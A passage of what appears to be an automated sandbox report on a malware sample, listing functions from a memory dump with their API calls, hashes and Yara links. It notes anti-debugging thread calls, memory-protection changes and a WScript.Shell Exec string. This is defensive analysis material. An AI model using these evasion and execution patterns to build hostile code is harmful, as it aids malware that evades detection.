                                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_000046B4), ref: 00563348
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,00000001,00000000), ref: 00563402
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: ExceptionHandlerMemoryProtectVectoredVirtual
                                  • String ID:
                                  • API String ID: 1128486366-0
                                  • Opcode ID: c218d363d71b815a452c2cab812118396d99cb8389022976d3ad1e885c9fbc50
                                  • Instruction ID: 656d175bade01b1b72870315598b64834918a8f1dea1f65284b269548632b9d6
                                  • Opcode Fuzzy Hash: c218d363d71b815a452c2cab812118396d99cb8389022976d3ad1e885c9fbc50
                                  • Instruction Fuzzy Hash: CA315A70600302EFEB149F64C99DBE93B55FF16360FA08655E8528B1A5CB30C4C5CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00563249, Relevance: 4.6, APIs: 3, Instructions: 92threadnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                    • Part of subcall function 0056330B: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_000046B4), ref: 00563348
                                    • Part of subcall function 0056330B: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,00000001,00000000), ref: 00563402
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectThreadVirtual$CreateExceptionHandlerTerminateVectored
                                  • String ID:
                                  • API String ID: 4104512072-0
                                  • Opcode ID: 768c72bafee77123a2d131896924f9ade57fb1507af167f20601b5912dd86066
                                  • Instruction ID: f78827e6a7007e5ce565cdecaea86afba64ba8404cf4d900bc5b25ff99e5bd31
                                  • Opcode Fuzzy Hash: 768c72bafee77123a2d131896924f9ade57fb1507af167f20601b5912dd86066
                                  • Instruction Fuzzy Hash: 16213B30249305AEEB245A649D9AFFA3A16FF57760FB44255FE428B1D5CB20C4C2CD22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00560ABA, Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1083COMMON
                                  Download Yara Rule
                                  Strings
                                  • ateObject("WScript.Shell")Set C = W.Exec (", xrefs: 00565AF6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: ateObject("WScript.Shell")Set C = W.Exec ("
                                  • API String ID: 0-104302683
                                  • Opcode ID: 9853ca69ad12d99181354522bd4d32f71e715836779c4d754c55d079f36aaea6
                                  • Instruction ID: 187e74a8999c37188d57db53ddf52097ceaf921aafdd5464afadddc287005d22
                                  • Opcode Fuzzy Hash: 9853ca69ad12d99181354522bd4d32f71e715836779c4d754c55d079f36aaea6
                                  • Instruction Fuzzy Hash: 3762EE70644306ABEF301E208D957FA3F67BF92350F784A26EC4697181D77988CADB46
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056143E, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 206nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,-000000D3,00000004,?,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 005614D4
                                  Strings
                                  • ateObject("WScript.Shell")Set C = W.Exec (", xrefs: 00565AF6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: ateObject("WScript.Shell")Set C = W.Exec ("
                                  • API String ID: 2706961497-104302683
                                  • Opcode ID: 3f6b92eddc906765e1aa8fa58d8c1a04949139ba8f09c73d4771280d98cbea96
                                  • Instruction ID: ea76e3c2a731d908c033fd156620409e7c2854ceb7cf33abd21575fb57a3d0d4
                                  • Opcode Fuzzy Hash: 3f6b92eddc906765e1aa8fa58d8c1a04949139ba8f09c73d4771280d98cbea96
                                  • Instruction Fuzzy Hash: 4C519C71548B859BEF218E208C4A7F93F11BB52340F6C466BE84B5B6A2F2248C47D75A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005614A6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,-000000D3,00000004,?,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 005614D4
                                  Strings
                                  • ateObject("WScript.Shell")Set C = W.Exec (", xrefs: 00565AF6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: ateObject("WScript.Shell")Set C = W.Exec ("
                                  • API String ID: 2706961497-104302683
                                  • Opcode ID: ffd2175eb32a420a4f9f6f627b194850c70259b8900b6cebc8e41ad0be47403c
                                  • Instruction ID: 4b067cf60e1ffd01d4b657881618b19decf1aa58313cbb9fc8d958774a191f05
                                  • Opcode Fuzzy Hash: ffd2175eb32a420a4f9f6f627b194850c70259b8900b6cebc8e41ad0be47403c
                                  • Instruction Fuzzy Hash: F351AE71448B869BDF219E20484A7F93F21BB53340F6C0657E84B1B5B2F2258857C75B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056091B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 9ed373f060e52ffb39c2494dd75b107ddae27e3dc2327c9af008218ccee0dbf5
                                  • Instruction ID: 6438a170e9ae99a10489403ed3df652924045e13645ece4db8151122c6bd0f48
                                  • Opcode Fuzzy Hash: 9ed373f060e52ffb39c2494dd75b107ddae27e3dc2327c9af008218ccee0dbf5
                                  • Instruction Fuzzy Hash: 14316EB09043478BFF009D6054427F73F216B4A3A0F759765DC4A579C2E1158C6BDAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00564532, Relevance: 3.1, APIs: 2, Instructions: 54sleepnativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00564657
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectSleepVirtual
                                  • String ID:
                                  • API String ID: 3235210055-0
                                  • Opcode ID: aff333b7985434c9c19781a282e8aa3e6839344818b485ad8570860fb0a462bb
                                  • Instruction ID: 063ddbe1220a34bfc308576998f41b1e9702a904706f2b06c684b84f7af677b2
                                  • Opcode Fuzzy Hash: aff333b7985434c9c19781a282e8aa3e6839344818b485ad8570860fb0a462bb
                                  • Instruction Fuzzy Hash: DF0104B16857009FEB105E20C88DBD97BD5BF563A1FAA8A44E9131B0E2D774C8C4CF12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569410, Relevance: 1.7, APIs: 1, Instructions: 167nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 9cda68732d93692c7357a49df1c8558e537f0d0062225e477f685430a40fbdfe
                                  • Instruction ID: 934338acf267dfdbc780c11b8642b89729829b0f8fac099f7623548553459bdf
                                  • Opcode Fuzzy Hash: 9cda68732d93692c7357a49df1c8558e537f0d0062225e477f685430a40fbdfe
                                  • Instruction Fuzzy Hash: 8341E52060C646CEDF245950C5907F42F99BB66374FB88B26C847478A4D375488BE693
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569446, Relevance: 1.7, APIs: 1, Instructions: 164nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: f85d6333a59f0f9d7b53519b96498d7521b9ed22e716d65148d1ef8c2794cbbd
                                  • Instruction ID: a6e33edcc5a84acc6143af89a4f7cef89c481962cb92b9a55a461b0644acfc2b
                                  • Opcode Fuzzy Hash: f85d6333a59f0f9d7b53519b96498d7521b9ed22e716d65148d1ef8c2794cbbd
                                  • Instruction Fuzzy Hash: B541E43060C646CEEF244910C5907F42F99BB66374FB88B26C847474A4E375888BE683
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056947E, Relevance: 1.7, APIs: 1, Instructions: 160nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: d5cbc40aa56e089e182f9dff6703a61b228062d3fc9bf7f96468b2ab30741f3c
                                  • Instruction ID: 258df9b799a03a2179dd335f215a0c1f34bc68423a69348ca08cb6ed4adc1395
                                  • Opcode Fuzzy Hash: d5cbc40aa56e089e182f9dff6703a61b228062d3fc9bf7f96468b2ab30741f3c
                                  • Instruction Fuzzy Hash: 5341F430608646CEDF244910C5907F43F99BB67374FB88B2AC847874A4E375888BE683
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005694B6, Relevance: 1.7, APIs: 1, Instructions: 159nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: f4524cbd523ddd80f4cc9d04b7e2dc32eb1466fb8743a9ce598d9d0f04f08e59
                                  • Instruction ID: afa2e8d11b62804986204e9e2dcd5000e70e0974b27c636853230b67f12620f6
                                  • Opcode Fuzzy Hash: f4524cbd523ddd80f4cc9d04b7e2dc32eb1466fb8743a9ce598d9d0f04f08e59
                                  • Instruction Fuzzy Hash: 78411430608646CEDF244910C5903F82F99BB67374FB84E2ACC47478A1E37988CBA693
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569603, Relevance: 1.7, APIs: 1, Instructions: 158nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 0f63cc28b551a690449cf47fe28b567e8e7800c74c0e9b40ccbcbbb47625eb18
                                  • Instruction ID: 3af86c2568de6abdce8d2cdd50c15a2ed757fac9083d9c6dddff0ad6121677c5
                                  • Opcode Fuzzy Hash: 0f63cc28b551a690449cf47fe28b567e8e7800c74c0e9b40ccbcbbb47625eb18
                                  • Instruction Fuzzy Hash: 17414720608642CEDF144910D5907F43F68BB63374FB99B66CC4B479A4E378489BEAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005694F3, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86d01a42864b30b0db4842db673d5197df1fd8cfca2acdecc9ab90902b2a04b7
                                  • Instruction ID: e554af9f9ae3f11893202d39d0f6d145409640152b835f3375ab5fd5a3630434
                                  • Opcode Fuzzy Hash: 86d01a42864b30b0db4842db673d5197df1fd8cfca2acdecc9ab90902b2a04b7
                                  • Instruction Fuzzy Hash: 2241E630608646CEDF244950C5907F83F99BB67374FB85B26CC47874A5D37988CBAA93
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056940A, Relevance: 1.6, APIs: 1, Instructions: 146nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: f86437562cb074d297d995d833b48fb53c5a0c47dd328370ae42202d2aa1698c
                                  • Instruction ID: b7d143d3447568f9d1d0f7b8a0fd0735105e54d30e05f1427975cb59b4c0b735
                                  • Opcode Fuzzy Hash: f86437562cb074d297d995d833b48fb53c5a0c47dd328370ae42202d2aa1698c
                                  • Instruction Fuzzy Hash: F141D13060C306CDDF245924CA947F82F9EFB66378FB84A2AC853870E4D37588C9E642
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056956E, Relevance: 1.6, APIs: 1, Instructions: 136nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: a9b1fbb95af3a1604dfe0f9897887bfb70f4fc517790da3339ed3186c7e67255
                                  • Instruction ID: c6dfdad4a3ddbbfa259eda57c73639adc0e8292705e954ac0e4d2a5a0293a070
                                  • Opcode Fuzzy Hash: a9b1fbb95af3a1604dfe0f9897887bfb70f4fc517790da3339ed3186c7e67255
                                  • Instruction Fuzzy Hash: 4741F530608606CEDF245920C5947F43F99BB67378FB85E16CC47874A4D37588CAEA93
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005695CE, Relevance: 1.6, APIs: 1, Instructions: 135nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 36e4f8c65851eb134ba13f069d694d15d25432203b01515817483685801617c7
                                  • Instruction ID: 8c7566779eb7d3619b00d75fcd366245e689ba8c380596d24f58019864f23a3f
                                  • Opcode Fuzzy Hash: 36e4f8c65851eb134ba13f069d694d15d25432203b01515817483685801617c7
                                  • Instruction Fuzzy Hash: 6441E220608606CEDF245910C5947F42FA9BB67378FB95B16CC47474A4D375888BEA83
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569670, Relevance: 1.6, APIs: 1, Instructions: 122nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: e529102f4b47ff8cc11cc50d237e36ebffd1243e4fa604196c8a2af7ec13877c
                                  • Instruction ID: 31be9b9975c216e9368da366138e21405f3ccb34d07721d65df8ee8813a2bd5c
                                  • Opcode Fuzzy Hash: e529102f4b47ff8cc11cc50d237e36ebffd1243e4fa604196c8a2af7ec13877c
                                  • Instruction Fuzzy Hash: 34310420608602CEDF145910D5947F42FA9BB67378FB95B66CC57474E0D378888BE6C3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056097A, Relevance: 1.6, APIs: 1, Instructions: 118nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: a4852d15978faa0f4f6b43954e813d66a4085e5a2cbd09f6b2feb9b473168c90
                                  • Instruction ID: 8f916a71431d1381d2f43f72ab9d77bce3c995a94793bd5e92f776c81895abd7
                                  • Opcode Fuzzy Hash: a4852d15978faa0f4f6b43954e813d66a4085e5a2cbd09f6b2feb9b473168c90
                                  • Instruction Fuzzy Hash: 9C315BA09047879BFE009D6068427E73F1067563A4F798762DC0A17EC6F0058C7F9AD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00560960, Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 5cd3ac52d52ba2261bf5761e07a0dd16a88028d5fd7c445a91e41bb29c89009c
                                  • Instruction ID: 10398330bfa2472eae1059422a14ea0f3b6ab49df46c8d94e68803f7fd008d17
                                  • Opcode Fuzzy Hash: 5cd3ac52d52ba2261bf5761e07a0dd16a88028d5fd7c445a91e41bb29c89009c
                                  • Instruction Fuzzy Hash: DF218BB0A043479BFF105E605C927EB3F256B4A3A4F384725DC551B5C2E1108C5BDAD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056467E, Relevance: 1.6, APIs: 1, Instructions: 94nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0056330B: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_000046B4), ref: 00563348
                                    • Part of subcall function 0056330B: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,00000001,00000000), ref: 00563402
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: 519b202118ef977d2290041fc086cb12e966b602907922f0997bfa476c7b17f5
                                  • Instruction ID: bc99e6affb37a4984445a90c2a385186d24aec643b3d88c160aa10d650af9afe
                                  • Opcode Fuzzy Hash: 519b202118ef977d2290041fc086cb12e966b602907922f0997bfa476c7b17f5
                                  • Instruction Fuzzy Hash: 5421C0702043469FEB0059549496BEA3B05BF573A0F758762DC0A47995DB14C487DDE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569862, Relevance: 1.6, APIs: 1, Instructions: 89nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 1a625ab6298a93c5c0cb192118f88a12e1e60756d9e8998f152faba5b604b762
                                  • Instruction ID: 33fbd7c7cf2fa7f169c6841e7a02acbbe1066f85817a9f83b3c7fc33dc247092
                                  • Opcode Fuzzy Hash: 1a625ab6298a93c5c0cb192118f88a12e1e60756d9e8998f152faba5b604b762
                                  • Instruction Fuzzy Hash: 62213420608206CEDF144950D6843F43FA8BF663B8FB99B56CC16078B4E37548DBDAD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056983A, Relevance: 1.6, APIs: 1, Instructions: 89nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 9f11070d94d4d1533bfdd414353ee453de5d60aa6960a5527744bc50508d6eef
                                  • Instruction ID: 36e0d4b1ca504a123d3055a50aeb671f3835f090d7419607e0593fc70f827468
                                  • Opcode Fuzzy Hash: 9f11070d94d4d1533bfdd414353ee453de5d60aa6960a5527744bc50508d6eef
                                  • Instruction Fuzzy Hash: B4213720608206CEDF145950D6843F43FA9BF66378FA99B55CC56078B4D37488CBE6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005698A3, Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: b27b86b9ee88631965357e7fed3ba4e3598bb36f8e99d3ad8dafda05b56e4906
                                  • Instruction ID: be85e3622a2d82ad33c7bd3651dcc53796f94d5217817a55bd6ba65e0bde856b
                                  • Opcode Fuzzy Hash: b27b86b9ee88631965357e7fed3ba4e3598bb36f8e99d3ad8dafda05b56e4906
                                  • Instruction Fuzzy Hash: FD212720708206CEDF144950D2843F43FA8BB56378F699B66CC4647874E3B548CFD6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005698D4, Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 4bf9935012d2571c7d409891de28251b07b0b3699567ede03e4234ca914c6ef9
                                  • Instruction ID: aa941886d175c739e0401980e64d59ddf32c398de49ecedfba41a53ec8712e74
                                  • Opcode Fuzzy Hash: 4bf9935012d2571c7d409891de28251b07b0b3699567ede03e4234ca914c6ef9
                                  • Instruction Fuzzy Hash: 98212720608206CEDF148950D2853E43FA8BF56378F699B65CC0607874E379489FD6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569A22, Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 9cd9ee6cf289c0a5ab9fd666d7f248a844509c1953a02b68474a9904aa362c54
                                  • Instruction ID: e179b90e75e078f7e0217203a27c13e9cc26dad1bdf4d093bd13a5d25674bcac
                                  • Opcode Fuzzy Hash: 9cd9ee6cf289c0a5ab9fd666d7f248a844509c1953a02b68474a9904aa362c54
                                  • Instruction Fuzzy Hash: 9D112B80B44687C6EE049950A0811E43B1178573A47BDDFB2CC0E17E68F16A097FE6F3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056990A, Relevance: 1.6, APIs: 1, Instructions: 75nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: 16b142ea75ec1d69d7ae003298bb18dbf999531fd22baba3797efb9fb332c55b
                                  • Instruction ID: 5695b1f1c4016cc0aa5dfaa02d30741e437139a6c67ce2de8c9d560dfbb6c270
                                  • Opcode Fuzzy Hash: 16b142ea75ec1d69d7ae003298bb18dbf999531fd22baba3797efb9fb332c55b
                                  • Instruction Fuzzy Hash: 2511E620608206CEDF144950D2853E43BA9BF663B8F699A56CC4607875E3B9488BD6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00569932, Relevance: 1.6, APIs: 1, Instructions: 75nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(00000000,?,00003000,00000004), ref: 00569B0E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID:
                                  • API String ID: 4046476035-0
                                  • Opcode ID: aabfd72ee0484144eeef47c22ec8580d38f270f9126c10212e47f5bd5df93678
                                  • Instruction ID: 9007587e59331e7d884ac5f58ff1a7d9f7a6b44f16144fafd934c7f4dffca219
                                  • Opcode Fuzzy Hash: aabfd72ee0484144eeef47c22ec8580d38f270f9126c10212e47f5bd5df93678
                                  • Instruction Fuzzy Hash: 78110820A08246CEDF148950E2853E43F99BB6637CF699B66CC0607875E3B548DFD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005646B4, Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 9a833caeb6f33549bbb05fa5d6142fe114214f8d6872fe3691df8069f8a4361f
                                  • Instruction ID: f133a603a9620c637e333d9b2708999f245b000a7b7c202e145b3de3c29d390e
                                  • Opcode Fuzzy Hash: 9a833caeb6f33549bbb05fa5d6142fe114214f8d6872fe3691df8069f8a4361f
                                  • Instruction Fuzzy Hash: 9D118071205205AFEB105B68D9DABEA3B47FF573B0F758152E90287195CB20C4C2CD21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056467A, Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0056330B: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_000046B4), ref: 00563348
                                    • Part of subcall function 0056330B: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,00000001,00000000), ref: 00563402
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: MemoryProtectVirtual$ExceptionHandlerVectored
                                  • String ID:
                                  • API String ID: 4193742754-0
                                  • Opcode ID: 52afd9fcc865fc9965561b54c6032e95f05fcbb3d1a70fedf994fac144f79c3f
                                  • Instruction ID: 1d2fab74cd8ab1979886c567e92a66315d6dff4a8e88374fcafb9499581f3ccc
                                  • Opcode Fuzzy Hash: 52afd9fcc865fc9965561b54c6032e95f05fcbb3d1a70fedf994fac144f79c3f
                                  • Instruction Fuzzy Hash: D5118C70205305AFE7116A68D9EABEA3F5AFF573A0B758251ED42871A5CF20C4C2CD21
                                  Uniqueness

